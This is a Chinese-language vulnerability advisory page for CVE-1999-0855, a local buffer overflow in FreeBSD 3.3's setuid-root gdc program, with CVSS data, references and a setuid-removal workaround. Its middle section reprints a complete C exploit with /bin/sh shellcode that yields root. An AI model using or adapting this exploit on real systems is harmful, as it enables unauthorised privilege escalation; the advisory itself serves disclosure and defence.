CVE-1999-0855
CVSS7.2
发布时间 :1999-12-01 00:00:00
修订时间 :2008-09-09 08:36:03
NMCOES    

[原文]Buffer overflow in FreeBSD gdc program.


[CNNVD]FreeBSD gdc 缓冲区溢出漏洞(CNNVD-199912-003)

        在FreeBSD gdc程序中存在缓冲区溢出漏洞。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0855
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0855
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-003
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/834
(UNKNOWN)  BID  834

- 漏洞信息

FreeBSD gdc 缓冲区溢出漏洞
高危 缓冲区溢出
1999-12-01 00:00:00 2005-10-20 00:00:00
本地  
        在FreeBSD gdc程序中存在缓冲区溢出漏洞。

- 公告与补丁

        A temporary solution is to remove the setuid bit from gdc.
        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19649)

FreeBSD 3.3 gdc Buffer Overflow Vulnerability (EDBID:19649)
freebsd local
1999-12-01 Verified
0 Brock Tellier
N/A [点击下载]
source: http://www.securityfocus.com/bid/834/info

There is a buffer overflow vulnerability known to be present in the version of gdc shipped with the 3.3-RELEASE version of FreeBSD. By default, only users in group wheel have execute access to gdc. The overflow occurs when the argument passed along with the -t flag (time) exceeds its predefined buffer length. It is possible to then corrupt the stack and alter the flow of execution (and execute arbitrary code). With gdc setuid root by default, this can lead to a local root compromise if exploited by users who have or gain access of or belong to the wheel group (or trusted gated group).

/* 

 * gdc exploit for Freebsd-3.3 yields euid=3D0(root)
 * by default, only group wheel (or whatever your trusted gated group is)=

 * and root can run gdc
 * Brock Tellier btellier@usa.net
 */


#include <stdio.h>

char shell[] = /* mudge@l0pht.com */
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";


main (int argc, char *argv[] ) {
 int x = 0;
 int y = 0;
 int offset = 0;
 int bsize = 4093;
 char buf[bsize];
 int eip = 0xbfbfdb65; /* works for me */

 if (argv[1]) { =

   offset = atoi(argv[1]);
   eip = eip + offset;
 }
 fprintf(stderr, "gdc exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\=
n");
 fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsi=
ze);
 =

 for ( x = 0; x < 937; x++) buf[x] = 0x90;
     fprintf(stderr, "NOPs to %d\n", x);
 =

 for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
     fprintf(stderr, "Shellcode to %d\n",x);
  =

  buf[x++] =  eip & 0x000000ff;
  buf[x++] = (eip & 0x0000ff00) >> 8;
  buf[x++] = (eip & 0x00ff0000) >> 16;
  buf[x++] = (eip & 0xff000000) >> 24;
     fprintf(stderr, "eip to %d\n",x);

 buf[bsize - 1]='\0';

 execl("/usr/local/bin/gdc", "gdc", "-t", buf, NULL);

}




		

- 漏洞信息

5999
FreeBSD gdc Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in FreeBSD. The gdc fails to check boundaries resulting in a buffer overflow. With a specially crafted request, in which the -t flag (time) in a gdc argument exceeds its predefined buffer length, an attacker who is in the wheel group can execute arbitrary code resulting in a loss of integrity.

- 时间线

1999-11-30 Unknow
1999-11-30 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: remove the setuid bit from gdc.

- 相关参考

- 漏洞作者

- 漏洞信息

FreeBSD gdc Buffer Overflow Vulnerability
Boundary Condition Error 834
No Yes
1999-12-01 12:00:00 2009-07-11 12:56:00
First posted to BugTraq by Brock Tellier <btellier@usa.net> on December 1, 1999.

- 受影响的程序版本

FreeBSD FreeBSD 3.3

- 漏洞讨论

There is a buffer overflow vulnerability known to be present in the version of gdc shipped with the 3.3-RELEASE version of FreeBSD. By default, only users in group wheel have execute access to gdc. The overflow occurs when the argument passed along with the -t flag (time) exceeds its predefined buffer length. It is possible to then corrupt the stack and alter the flow of execution (and execute arbitrary code). With gdc setuid root by default, this can lead to a local root compromise if exploited by users who have or gain access of or belong to the wheel group (or trusted gated group).

- 漏洞利用

Exploit available:

- 解决方案

A temporary solution is to remove the setuid bit from gdc.

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站